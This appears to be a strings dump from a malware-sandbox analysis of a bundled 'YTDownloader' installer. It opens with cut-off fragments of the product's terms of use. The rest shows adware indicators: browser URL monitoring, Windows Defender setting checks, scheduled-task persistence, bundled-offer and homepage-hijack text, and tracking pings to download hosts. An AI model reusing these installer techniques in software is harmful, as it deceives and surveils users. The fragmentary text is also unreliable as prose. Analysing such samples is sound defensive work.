{\nofwords2316}{\nofchars13206}{\nofcharsws15492}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1501\margr1502\margt1440\margb1440\gutter0\ltrsect

The following license and terms of use (jointly: "Terms of Use") govern your access and use of the YTDownloader.com website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and

ll Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, tools and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally b

ive websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of Use limit our liability and that we do not provide warranties for YTDownloader or contents. It also limits your remedies.}{\rtlch\fcs1

lely for your private and personal purposes and always in accordance with the Terms and Use and the applicable law. Any other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons

is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or otherwise act in a way that interferes with other users\rquote

verse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents or materials on or received via YTDownloader without our prior written consent. You also agree to not remove, obscure, or alter any copyrig

TDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update the YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exerc

\~}{\field{\*\fldinst {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 HYPERLINK "mailto:}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect

the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own discretion and at your own ri

\par }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid1449721\charrsid1449721 YTDownloader includes certain marks, graphics, logos, page headers,

, licensors, suppliers and their respective directors, employees, agents a}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\cf1\insrsid3632102 nd shareholders (jointly: the "}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

s to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warranties and liability regarding the accuracy, completeness, security, reliability, timelin

ss, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties, so the above exclusions in whole or in part may not apply to you in your country or j

nder applicable law, in no event shall the Goobzo parties be liable for any damage whatsoever including but not limited to any direct, indirect, consequential, special, exemplary, punitive or incidental damages (including but not limited to damages for lo

s of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, contract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointl

urisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your country or jurisdiction and in such case the aggregate liability of the Goobzo parties shall

responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses caused by such member.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

You may create links to this Site from other websites in as much as it is clear that we do not endorse you or your activity, business, products or services and that you and us are not affiliated in any way.\line }{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102\charrsid3632102 [email protected]}{\rtlch\fcs1 \af1\afs20 \ltrch\fcs0 \f31507\fs20\insrsid3632102 " }}{\fldrslt {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\cs18\f31507\fs20\ul\cf2\insrsid3632102\charrsid16527760 [email protected]}}}\sectd \ltrsect\linex0\headery708\footery708\colsx708\endnhere\sectlinegrid360\sectdefaultcl\sectrsid8879180\sftnbj {\rtlch\fcs1 \af1\afs20 \ltrch\fcs0

\sbasedon0 \snext17 \sunhideused \styrsid5573618 Normal (Web);}{\*\cs18 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \sbasedon10 \spriority0 \styrsid5573618 apple-converted-space;}{\*\cs19 \additive \rtlch\fcs1 \af0 \ltrch\fcs0 \ul\cf2

\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author Edith}{\operator Edith}{\creatim\yr2014\mo3\dy24\hr8\min26}{\revtim\yr2014\mo10\dy27\hr12}{\version22}{\edmins1585}{\nofpages3}{\nofwords2318}

{\nofchars13216}{\nofcharsws15503}{\vern57437}}{\*\xmlnstbl {\xmlns1 hXXp://schemas.microsoft.com/office/word/2003/wordml}}\paperw12240\paperh15840\margl1800\margr1800\margt568\margb1440\gutter0\ltrsect

\b\f40\fs16\insrsid11944020\charrsid14186020 \line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid14186020 1. Acceptance of Terms of Use\line The following license and terms of use (jointly: "Terms of Use") go}{\rtlch\fcs1

website ("Site") and your download, install, access and use of the YTDownloader Browser Application and Add-On ("YTDownloader Add-On") and all Site and YTDownloader Add-On contained or displayed information, and any and all available editions, add-ins, t

ols and documentations, either jointly or separately (collectively and separately known as "YTDownloader"). The Terms of Use are a legally binding agreement between you, ("you", "visitor" and/or "user"), and Goobzo Ltd. and its affiliates and subsidiaries

r or parts thereof at our sole discretion and without liability. The products and services described on YTDownloader (and their respective websites) are each subject to their respective terms and conditions or agreements. Please note that these Terms of U

ny other use is prohibited. The use of any software or automated system to extract data from YTDownloader.com or the YTDownloader Add-Ons is strictly prohibited. You will not disrupt the functioning of the YTDownloader.com or the YTDownloader Add-Ons or o

py, modify, adapt, distribute, transmit, translate, display or otherwise exploit YTDownloader and you shall not try to reverse engineer, reverse assemble, reverse compile, decompile, disassemble, translate or otherwise alter any executable code, contents

ith or through the Site. We reserve all rights not expressly granted in and to the Site. We reserve the right to terminate your access to YTDownloader temporarily or permanently, with or without notice to you, and are not obligated to support or update th

YTDownloader service. You acknowledge and agree that YTDownloader will not be liable to you or any third party in the event that we exercise our right to modify or terminate access to the YTDownloader service. Unless explicitly stated otherwise, any new

[email protected]}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3606027 " }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid3886136 {\*\datafield

0000a5ab0000}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid3606027\charrsid2648633 [email protected]}}}\sectd \ltrsect

looking statements made on the Site are based on our best judgment but are subject to a number of uncertainties as well as events beyond our control. You understand and agree that your access and use of the Site and its contents is entirely at your own di

\f40\fs16\cf1\insrsid11944020\charrsid14186020 . Trademarks\line }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid425254 YTDownloader includes certain mark

and personal use only with no warranties whatsoever. Goobzo, its affiliates, partners, licensors, suppliers and their respective directors, employees, agents and shareholders (jointly: the " Goobzo parties") do not assume any liability whatsoever and disc

loader and included services and contents, including, without limitation, warranties as to accuracy, performance, merchantability, fitness for a particular purpose, and non-infringement. The Goobzo parties, jointly and severally, also disclaim any warrant

es and liability regarding the accuracy, completeness, security, reliability, timeliness, and performance of the YTDownloader, services and contents. Some countries and jurisdictions do not allow the exclusion or disclaimer of certain terms or warranties,

, exemplary, punitive or incidental damages (including but not limited to damages for loss of income or profits, business interruption, loss of business information, loss of goodwill or reputation, and the like) whether such claim is based on warranty, co

tract, tort (including negligence), or otherwise, and even if the Goobzo parties, jointly or separately, have been advised of the possibility of such damages or loss. Such limitation of liability shall also apply whether the damages arise from use, misuse

t of personal injury or death arising from the negligence of Goobzo. Some countries and jurisdictions do not allow the exclusion or disclaimer or limitation of liability of certain types of damages, so the above exclusions may not apply to you in your cou

While these limitations of liability provisions use the Goobzo parties definition, the responsibilities and liabilities are not on a joint and several basis (i.e. each member of the Goobzo parties shall be solely responsible for the damages and losses ca

\par 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020 1}{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\cf1\insrsid11944020\charrsid14186020 . Links to this Site\line You may create links to this Site from other websites in a

Failure or delay of Goobzo exercise any right, power or remedy under or to require or enforce strict performance by you of any provision of th

\ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 HYPERLINK "mailto:[email protected]" }{\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \f40\fs16\insrsid11944020\charrsid413544 {\*\datafield

0000a5ab00000066000100d9}}}{\fldrslt {\rtlch\fcs1 \af40\afs16 \ltrch\fcs0 \cs19\f40\fs16\ul\cf2\insrsid11944020\charrsid413544 [email protected]}}}\sectd \ltrsect

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Top of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Bottom of Form;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 Normal (Web);\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Acronym;

\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Keyboard;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Preformatted;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Sample;\lsdsemihidden1 \lsdunhideused1 \lsdlocked0 HTML Typewriter;

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

?/?6?<?_?

9":(:,:0:4:

<*=/=9=|=

3#3'3 3/333

8 8$8(8,8084888<8@8

5 5$5(5,5

,=0=4=8=<=

: :(:0:8:

>4?8?<?@?

<$<,<4<<<

= =@=`=|=

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Invalid parameter or key doesn't exist.

Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.

The flag CR_INST_STORE_ZIP_ARCHIVES should be used with CR_INST_DONT_SEND_REPORT flag.

%s %s Error Report

CrashSender.exe is not found in the specified path.

crashrpt_lang.ini

l%s\CrashRpt\UnsentCrashReports\%s_%s

Couldn't create crash report directory.

Couldn't set C   exception handlers for main execution thread.

Couldn't launch CrashSender.exe process.

%s-tmp

Local\CrashRptEvent_%s_2

The operation was cancelled by client.

Error launching CrashSender.exe

%s has stopped working

Invalid registry key or invalid destination file is specified.

HKEY_LOCAL_MACHINE\

HKEY_CURRENT_USER\

Empty subkey is not allowed.

The registry key coudn't be open.

Local\CrashRptEvent_%s

%s\%s_%s\%s

%u.%u.%u.%u

chrome.exe

iexplore.exe

firefox.exe

safari.exe

opera.exe

explorer.exe

chrome

firefox

opera

@Google Chrome

Chrome_WidgetWin_1

chrome://settings-frame/#syi516

ChromeGetUrl::Initialize ReRun

ChromeGetUrl Done

ChromeGetUrl::BuildChromeHandles found window class name: %s

ChromeGetUrl::BuildChromeHandles HWNDS: %s

ChromeGetUrl::BuildChromeHandles Could not find Chrome windows, exiting..

%d secs

Name - %s

Value - %s

https

URL: %s changed to: %s

Adding URL:

Adding URL: %s

@Firefox

FirefoxBrowserWindow Found button window, 0x%x

FirefoxBrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

@Opera

OperaBrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

SafariBrowserWindow Found browser window, 0x%x

ESOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

GetModule failed. Err=%d

OpenProcess failed. Err=%d

JCertGetNameString failed.

CryptDecodeObject failed with %x

CryptQueryObject failed with %x

CryptMsgGetParam failed with %x

Program Name : %s

Publisher Link : %s

MoreInfo Link : %s

CertFindCertificateInStore failed with %x

CBOT_Condition::IsToInstall Return %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Work] TID=%X

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

Your %s is almost ready for use.

Click YES on the next screen to allow %s to complete integration.

wevtapi.dll

%SystemRoot%\System32\Winevt\Logs\Application.evtx

Event / System[EventID = %d] /Provider[@Name='MsiInstaller']

EvtRender failed with %d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

%ddd

SB_TASK_%d

CreateTask: Query IExecAction failed

RUNONCE_%d

PT%dS

d-d-dTd:d:d

PT%dH

; UnelevateExecutable: Initialize failed

UNELEVATE_%d

; UnelevateExecutable: CreateTask failed

; UnelevateExecutable: RegisterOnceTask failed

; UnelevateExecutable: Task is still not running after 30 seconds. Task state = %d

%d.%d.%d.%d

Windows NT 6.1

Install.log

@REGKEY

.ReturnCode

cr.exe

%%SBDATE%%

%%SID%%

%%SUB%%

%%FULL_SUB%%

GetXml - Magnet is empty: %s

&ver=%s&are=%s&qre=%s&avre=%s&kbd=%s&tz=%s&pp=%s

GetFile - Failed to connect (Err=%d): %s

GetFile - Failed to connect: %s

GetFile - Get Failed (Err=%d): %s

GetFile - Get Failed: %s

GetFile - Read data Failed (Err=%d): %s

GetFile - Read data failed: %s

Failed to create process file (%x).

Mtx%d

Windows NT 5.1

Windows NT 6.2

Windows NT 6.0

Windows NT 5.0

?prd=%s&aff=%s&ver=%s&rnd=%d&tss=%d&action=%s&actionparam=%s&usid=%s

/p.ashx

Sock_Ping : getaddrinfo error = %d

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko; SBUA) Chrome/28.0.1500.95 Safari/537.36

GET %s HTTP/1.1

Host: %s

User-Agent: %s

close failed with error: %d

/S /PING /Action=%s /ActionParams=%s /PingParams=%s

/S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

ScheduleDownload Initialize Failed: %s

ScheduleDownload CreateTask Failed: %s

Start time: %s. End time: %s.

ScheduleDownload RegisterDailyTask Failed: %s

ScheduleInstaller Initialize Failed: %s

ScheduleInstaller CreateTask Failed: %s

ScheduleInstaller RegisterDailyTask Failed: %s

DeleteScheduleDownload Initialize Failed: %s

DeleteScheduleDownload DeleteTask Failed: %s

\Installer\Install%s_%ld

ShellExecute:

Second shellExecute:

RunAsAdmin failed : shell execute failed

HKEY_LOCAL_MACHINE64

Windows Vista

Windows Server 2008

Windows 7

Windows 8

Windows Server 2008 R2

Web Server Edition

Windows Server 2003 R2,

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003,

Web Edition

Windows XP

Windows 2000

(build %d)

FWCMD

GetTimeZoneInformation failed error %d

CInstallerUtils::AccessRegistryKeyValue64Bit Error opening key

CInstallerUtils::AccessRegistryKeyValue64Bit Could not read registry value

SOFTWARE\Microsoft\Windows NT\CurrentVersion

d/d/%d d:d

%d seconds

SUCCESSKEY

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

REPORT

TSMtx%d

%s /SECONDSTAGE /Mutex=%s /PIXGUID=%s

Error creating shared memory. Err=%d

Error running file: %s

Timeout expired (%d)

Error opening mutex. Err=%d

Return code = %d

Error reading return code. Err=%d

dfb5uyoqjsg4c.cloudfront.net

d1cfk8e4o0c4u2.cloudfront.net

d1vw44q53d84jx.cloudfront.net

Kernel32.dll

Error %d

ACUrl:

ProxyUrl:

ProxyBypass:

Bkernel32.dll

HKEY_USERS

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

BRWURLS

CInstallMgr::Work, exception: %s

KEYBOARD

XML is incorrect. Xml size=%d. Xml= %s

XML is incorrect. Xml size=%d. Plain Xml= %s

XML %s

bxsdk32.dll

Failed to download bxsdk dll. Error=%d

MINVERURL

REPORT_PROG

/S /REPORT /NUM=%d /AFF=%s

PINGURL

Incorrect xml - No products Node. Xml size=%d

ALTURL

REGKEY

AFFREGKEY

OCSetupHlp.dll

OC_KEY

IMAGE_URL

Cur ver %s, min ver %s

/ENC /S /MAG=%s /INSTALL /dir=%s /products=%s /pixGuid=%s /sub=%s

%d of 1

%d of %d

CInstallMgr::ReportSize

Schedule report failed

SOFTWARE\Microsoft\Windows Defender\Real-Time Protection

SOFTWARE\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction

SOFTWARE\Microsoft\Windows Defender\Signature Updates

SignatureVersion: %s ; RealTimeDisabled %d DownloadDisabled %d RunningDisabled %d ; DefActionSevere %d DefActionHigh %d DefActionMedium %d DefActionLow %d

OpenCandy init failed. Error=%d. Dll path=%s

Failed to download OpenCandy dll. Error=%d

Waited %d seconds

%%successProd%%

%úiledProd%%

Install %s

Set and keep www-searching.com my default search and homepage

By clicking Install, you agree to the <a href="hXXp://VVV.ytdownloader.com/legal/privacy/">Privacy Policy</a> and <a href="hXXp://VVV.ytdownloader.com/legal/terms/">Terms of Service</a>

Link %s

Client for product key 1 loaded.

Client for product key 2 loaded.

Recommended by %s

<a href="%s" id="TOS %s">Terms of Service</a>

<a href="%s" id="Privacy %s">Privacy Policy</a>

Offer %d: Title: %s; Description: %s

Offer %d, Result %d

Exception CHttpDownload::GetNextRange for URL %s

CHttpDownload::Open handle %d to file %s

Failed to open file %s, error = %d

__ERROR CHttpDownload::Read failed for file %s

CHttpDownload::Repot Bytes %I64d ,Total %I64d, by Downloader %d

Range=%I64d RangeReadBytes=%I64d connection %d Error %x

RedownloadRange %s err = %d headers=%s

CHttpDownload::RedownloadRange for URL %s

%sid=%d_r=%lld_err=%d

CHttpDownload::ReportError for URL %s

CHttpDownload::GetNextRange for URL %s

Get Failed : connection %d err %s (0x%X)

CHttpDownload::DownloadNextRange for URL %s

CHttpDownload::Close handle %d to file %s

CHttpDownload::NOT Close handle %d to file %s

CHttpDownload::Work for URL %s

PRESUCCESSKEY

DOWNLOAD START: %s

Download in virtual mode product: %s

Download Failed to createCHttpDownload:

Download Failed to createCHttpDownload: %s

Download - Failed to connect: %s

Download - Get Failed: %s

Http Reply code = %d

Download Failed to create downloaders list: %s

CProductInstaller::Get for product: %s, exception: %s

CProductInstaller::GetNextRange - No Next Range for product %s

CProductInstaller::GetNextRange - product %s start=%I64d end=%I64d size=%I64d

CProductInstaller::Close for Product %s

DownloadMultiConnection:file %s exists on disk %s

DownloadOneConnection FromScheduler : %s

DownloadOneConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadOneConnection): err=%s (0x%X)

Success %s FileSize= %I64d

DownloadMultiConnection FromScheduler : %s

DownloadMultiConnection FromScheduler will download: %s, file DOES NOT exist on disk %s

Get failed (DownloadMultiConnection): err=%s (0x%X)

INSTALL START: %s

/aff=%s /rnd=%d

/rnd=%d

CProductInstaller::InstallProduct for Product %s

DOWNLOAD BYTES: %s NumOfBytes = %I64d

DOWNLOAD NOT COMPLETED: %s

Trying One Connection Fallback: %s

Download failed, error (%x), %s - Trying Multiple Connection Fallback

RunFromScheduler: Trying Main Connection Fallback: %s

Trying main URL in one Connection %s %s

Trying Alternative Connection Fallback: %s

Alternative Connection %s %s

Alternative Connection Failed: %s

Download failed, error (%x), %s %s

Download failed, error (%x), %s

CProductInstaller::OnDownloadNotCompleted for Product %s

OnDownloadCompleted: %s, exiting status %d

status %d, id %d, total bytes %I64d, file size %I64d, %s

DOWNLOAD END: %s %s

%s, %d

DOWNLOAD END: Not all completed %s

%s FileSize= %I64d

CProductInstaller::OnDownloadCompleted for Product %s

INSTALL BEGIN: %s

INSTALL END: %s

CProductInstaller::OnInstallCompleted for Product %s

Install failed, error: %s

%s: %s

CProductInstaller::OnInstallNotCompleted for Product %s

%s - %s

SkipInstall - %s

/S /SCHEDULE /MAG=%s /pn=%s /pixGuid=%s /sub=%s /Reason=%s

CProductInstaller::AddToScheduler for Product %s

CProductInstaller::RemoveFromScheduler for Product %s

RESUCCESSKEY

%s:%s

UI screen timeout - %s

CRandomCondition::IsToInstall value = %s

CRandomCondition::IsToInstall mode result = %d

%d:%d

CRandomCondition::IsToInstall Return %d

CCMDLINE

YTDi 1.0.0.1

1.0.0.1

CrashRpt YTDi 1.0.0.1 Error Report

/INSTALL /dir=%s /products=%s

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

By clicking Next, you agree to install %s and agree to the <a id="TOS" href="%s">Terms of Service</a> and <a id="Privacy" href="%s">Privacy Policy</a>.

%s:%s;

RICHED20.DLL

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

HTTP/1.1

XXX

Content-Disposition: form-data; name="%s"

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

D%sLow\%s\

%s\%s\%s\

%C:\Users\Public\Documents\%s\%s\

%s\Application Data\%s\%s\

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::BackupTraceFile] %s

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

\StringFileInfo\x\%s

<d/d/%d d:d:d::d 0x%X>

the %s <a href="%s">Terms</a> and <a href="%s">Privacy Policy</a>

@%s?e=%s

zvl=%s&

File open error %d. File=%s

File size is 0. File=%s

Buffer allocation error %d

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\DC%original file name%.exe

2.8.0.999

ns8.tmp_1860:

.text

`.rdata

@.data

.reloc

SShL0

PeekNamedPipe

CreatePipe

KERNEL32.dll

USER32.dll

ADVAPI32.dll

nsExec.dll

:":2:7:@:

DC%original file name%.exe_1280:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

OtSSh

VQSSh

PSSSSSSh

t!SShT

PSSSSh

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

1.3.6.1.4.1.311.2.1.12

Cannot put the trigger ID: %x

{X-hX-hX-XX-XXXXXX}

Host Name: %s

Domain Name: %s

DHCP scope name: %s

GetNetworkParams failed with error: %d

WinHttpGetIEProxyConfigForCurrentUser failed with the following error number:

ERROR_WINHTTP_INTERNAL_ERROR

AutoConfigURL (MyProxyConfig.lpszAutoConfigUrl) is:

AutoConfigURL (MyProxyConfig.lpszProxy) is:

AutoConfigURL (is:

550e832f-a497-4eb7-bb40-8cc856f6d152

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

C:\BUILDS\Build_STUB\Installer\Release_YTDK\YTDKi.pdb

GetProcessHeap

KERNEL32.dll

EnumThreadWindows

EnumChildWindows

MsgWaitForMultipleObjectsEx

GetKeyboardLayoutList

USER32.dll

WS2_32.dll

GDI32.dll

RegOpenKeyExW

RegEnumKeyW

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegNotifyChangeKeyValue

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

OLEACC.dll

COMCTL32.dll

PSAPI.DLL

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

VERSION.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

SHFileOperationW

RPCRT4.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

GetCPInfo

zcÁ

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

.?AVCHttpFileDownload@@

.?AVCHttpAsync@@

.?AVCHttpDownload@@

.?AVCHttp@@

222222222

55555.ccc

22222222

22222222222

2222222222

222222222222

))aaaaaaaaaaaaa555555.7.??.cccccccAAAAAAAAAAAAA

2222222

..ccc

5.77..Lc7cEEcc7AAATE

|444|44|4

||||4|444

MM.LJ

MMM)MMBMBMBB???BBB??..?....L7.LLLEEEEEATAT

CMIC.CF?

@@,,@@,@@@@

**,,,,@,,@@,,

MMMMMBB???.BB?.7??.7.7LL7.7ELLELL7ETAETTTTT

@@,,@,,,,

MMBB???B?.......777.?.LLLLLLLETT

,,@,,,*,,,*

.hsdy>

,,,,*,,***

,,,@@,**,,,

MBMBBBBBB??????.B??.7c.77.LELL7LEEEL7E

,,****,*

MBMB??BBB???????...??777..LLEL7LAEEcAAATT

,**,,****

B???...7.7.777LLLL7ELAAAAAATAA

BB?.??.....?..LLLELEAAcEAEET

    #    #

B??BBMBB???BB....7777L7.LAATTELE

111111111

11111111111

BBMB?BB????...777.LLLL7LLAET

BB?.?.BBB???...LL7.77LLEEEEELTTTT

RRVVw%%X

#  #1111

BB??..77.7777.777EAEELELET

1111111

11111111

B??BB??..?..7..7L..LLLL

B??B?.B?......?..7.LL7LL

B??.?......LLL..

BB.....77.7LLL..LLEE

MBB??????.7.77.777L

MMBMMB..????....777.LEEE

??7.7.LLLL7LETL

8888888

BB.BB?........L77L

BMMB?B?....777.7.7.EEL

BBB.?B.77.......ETEE

BB.BB........7LLETTT

88888888

B???BB..BB?..7LLLT

BB.??BB..BB..7777L

B???????BB.?...LLLL7

BMB..BB.7.ELLLL77L

BBB??BB.?.LLLL77.

888888888

MBB?....B...cLLLLLLT

___&_&&&

__&&____&

____&___&&

____&__&_&

BM?.BBB?....777L

&&____&__&&__&&____

_&_&&_&&

.njm4tyyxwwwwxyytm3k.

\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author udif}{\operator Edith}{\creatim\yr2013\mo10\dy22\hr16\min58}{\revtim\yr2014\mo8\dy24\hr14\min26}{\version5}{\edmins16}{\nofpages4}

